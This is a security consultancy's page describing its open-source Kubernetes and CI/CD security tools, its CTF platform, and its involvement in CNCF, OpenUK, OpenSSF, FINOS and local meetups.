Open Source, Community, and Presentations

Open Source

Our Red and Blue Team open source


Security risk analysis for Kubernetes resources. Identifies misconfigurations and generates recommendations to improve the security of Pods, Deployments, and other resources. Used to find insecure configurations, harden security contexts, and learn Kubernetes pod security. Available as: a command line tool; free API; kubectl plugin to scan resources already in the cluster ; or a GitHub Action to run in CI/CD pipelines; GitHub Marketplace and GitLab Marketplace.


Network security testing for DevSecOps workflows. A framework for fast, safe iteration on firewall, routing, and NACL rules for Kubernetes (Network Policies, services) and non-containerised hosts (cloud provider instances, VMs, bare metal). Aggressively parallelises nmap to test outbound network connections and ports from any accessible host, container, or Kubernetes pod by joining the same network namespace as the instance under test.


Kubernetes production breach simulation. Used to provision ControlPlane CTFs, and as the official CTF engine for every KubeCon since 2019. Provisions full, production-like infrastructure for attacking and debugging Kubernetes: creates a private Kubernetes cluster for each player; runs scenarios demonstrating compromise paths and vulnerabilities; trains defenders to mitigate vulnerabilities.


Security analysis for Kubernetes Operators. Analyses YAML manifests before they’re deployed to detect high-risk configurations and prevents compromised Operators from taking over a cluster through loose RBAC configurations. KubeCon EU 2022 talk on BadRobot and operator security.


Hunt secrets in a process’s memory. A mashup of TruffleHog and gdb, it analyses a target application’s memory and outputs discovered secrets and high entropy strings. Useful for adversarial emulation, penetration testing, and testing defence in-depth security controls.


Detect security issues in Tekton Tasks. Static analysis to detect vulnerable Task configurations and block insecure CI/CD pipelines. Best-practice checks to prevent secrets leakage, code injection, and build stage bypass.

Tekton Chains Storage Forwarder

Tekton Tasks provenance storage OCI shim. Provides a Mongo buffer for attestation and verification metadata, before forwarding them to OCI storage as the default provider does. Backfill for functionality not yet supported in Tekton Chains.


Security leadership and collaboration

Security Technical Advisory Group, The Linux Foundation (CNCF)

TAG Security is a community-run effort to secure access, policy control, privacy, auditing, and explainability of cloud native security. It sits under the Linux Foundation’s Cloud Native Computing Foundation (CNCF) — the home of Kubernetes, Prometheus, and containerd (the Docker runtime) — with a combined project market cap of $18.9T. Responsible for threat modelling and assuring cloud native technologies that are contributed to the CNCF, and assisting maintainers with security work.

ControlPlane CEO Andrew Martin is a co-chair and Head of Security Rowan Baker is a long-term contributor, including the Supply Chain Security and Cloud Security whitepapers.


OpenUK is a charity dedicated to the advancement of open source in the United Kingdom with a focus on its security, legal ramifications, and the community.

ControlPlane CEO Andrew Martin sits as the charity’s pro bono CISO, advising the public and private sectors and advocating on the group’s behalf. His personal mission is to facilitate the fair remuneration of open source maintainers, enabling them to prioritise security remediation and ensuring the safe adoption of open source.

OpenSSF (Linux Foundation)

The Open Source Security Foundation implements community-wide, industry-supported security initiatives to protect open source software development and delivery.

FINOS (Linux Foundation)

The Fintech Open Source Foundation assists in open source adoption, infrastructure code reuse, and community collaboration for financial services organisations.

ControlPlane contributes into multiple working groups (including the FINOS Common Cloud Controls), conferences, and meetups.

Local Community Meetups

We run:

  • Service Mesh London with Tetrate
  • DevSecCon London with Snyk
  • Threat Modelling London
  • and any other Meetup we can help out!


Our ethos is open source security, sharing with the community and learning to secure the next generation of technology in public.


Our contributions to books, whitepapers, and training courses.


Interviews and panels across the years.